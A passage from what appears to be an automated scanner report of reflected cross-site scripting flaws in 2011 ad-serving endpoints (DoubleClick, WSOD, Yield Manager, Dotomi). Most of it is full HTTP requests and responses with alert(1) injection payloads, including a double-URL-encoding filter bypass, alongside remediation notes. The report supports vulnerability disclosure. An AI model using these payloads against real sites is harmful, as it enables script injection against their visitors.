GET /adj/iblocal.hearsttv.wptz/index26096'-alert(1)-'66ba3d012db;kw=containerlinkswelike;pos=1;sz=253x300;ord=8710159196052700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1289

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index26096'-alert(1)-'66ba3d012db;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6814682?">
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6665e'%3balert(1)//5533bfaa5b9 was submitted in the kw parameter. This input was echoed as 6665e';alert(1)//5533bfaa5b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.homepage/local;kw=6665e'%3balert(1)//5533bfaa5b9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 468
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:30:04 GMT
Expires: Sat, 09 Apr 2011 12:30:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/t;238193711;0-0;0;12662198;3454-728/90;41302796/41320583/1;;~okv=;kw=6665e';alert(1)//5533bfaa5b9;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home">
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b456d'-alert(1)-'b6a2f49202b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302352178986?&b456d'-alert(1)-'b6a2f49202b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 487

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/n;238193711;1-0;0;12662198;3454-728/90;41550499/41568286/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;;b456d'-alert(1)-'b6a2f49202b=1;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/burlington-vt">
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/ibs.pla.news/local [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.news/local

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 932ae'%3balert(1)//f0c51e288f7 was submitted in the kw parameter. This input was echoed as 932ae';alert(1)//f0c51e288f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.news/local;kw=932ae'%3balert(1)//f0c51e288f7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 468
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:30:17 GMT
Expires: Sat, 09 Apr 2011 12:30:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/u;238193711;0-0;0;12657116;3454-728/90;41302796/41320583/1;;~okv=;kw=932ae';alert(1)//f0c51e288f7;~aopt=2/2/2678/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home">
...[SNIP]...

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 323a7%2522%253balert%25281%2529%252f%252f80464a2a6d5 was submitted in the REST URL parameter 2. This input was echoed as 323a7";alert(1)//80464a2a6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357323a7%2522%253balert%25281%2529%252f%252f80464a2a6d5/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357323a7";alert(1)//80464a2a6d5/779.0.js.88x31/1302538905**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678
...[SNIP]...

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65205%2522%253balert%25281%2529%252f%252f8a3c794d307 was submitted in the REST URL parameter 3. This input was echoed as 65205";alert(1)//8a3c794d307 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x3165205%2522%253balert%25281%2529%252f%252f8a3c794d307/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x3165205";alert(1)//8a3c794d307/1302538908**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%
...[SNIP]...

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 301ef"-alert(1)-"d146c56c313 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f301ef"-alert(1)-"d146c56c313 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
click.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f301ef"-alert(1)-"d146c56c313">
...[SNIP]...

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10881"-alert(1)-"80d49f0fc0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f&10881"-alert(1)-"80d49f0fc0a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1753

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
lick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f&10881"-alert(1)-"80d49f0fc0a=1">
...[SNIP]...

1.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ac8"-alert(1)-"0ebbe4f0048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=10&ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html&f4ac8"-alert(1)-"0ebbe4f0048=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; ih="b!!!!)!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; vuday1=d-=>Rd-=>R!4)FWKw-DF; BX=265jgc96pflsl&b=4&s=b9&t=92; liday1=fh'jT$o@U<!4)FWqJ%Ow

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:01:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:01:39 GMT
Pragma: no-cache
Content-Length: 4410
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=728x90&anmember=541&anprice=10&f4ac8"-alert(1)-"0ebbe4f0048=1&referrer=http%3a%2f%2fwww.foxnews.com%2fpolitics%2findex.html&s=1836970&_salt=2073956677";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_d
...[SNIP]...

1.22. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b71'%3balert(1)//052d30bafe5 was submitted in the admeld_adprovider_id parameter. This input was echoed as e8b71';alert(1)//052d30bafe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78e8b71'%3balert(1)//052d30bafe5&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:26 GMT
X-Name: rtb-o05
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78e8b71';alert(1)//052d30bafe5&external_user_id=0&expiration=1302798086" alt="" />');

1.23. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23569'%3balert(1)//b87386ea441 was submitted in the admeld_callback parameter. This input was echoed as 23569';alert(1)//b87386ea441 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

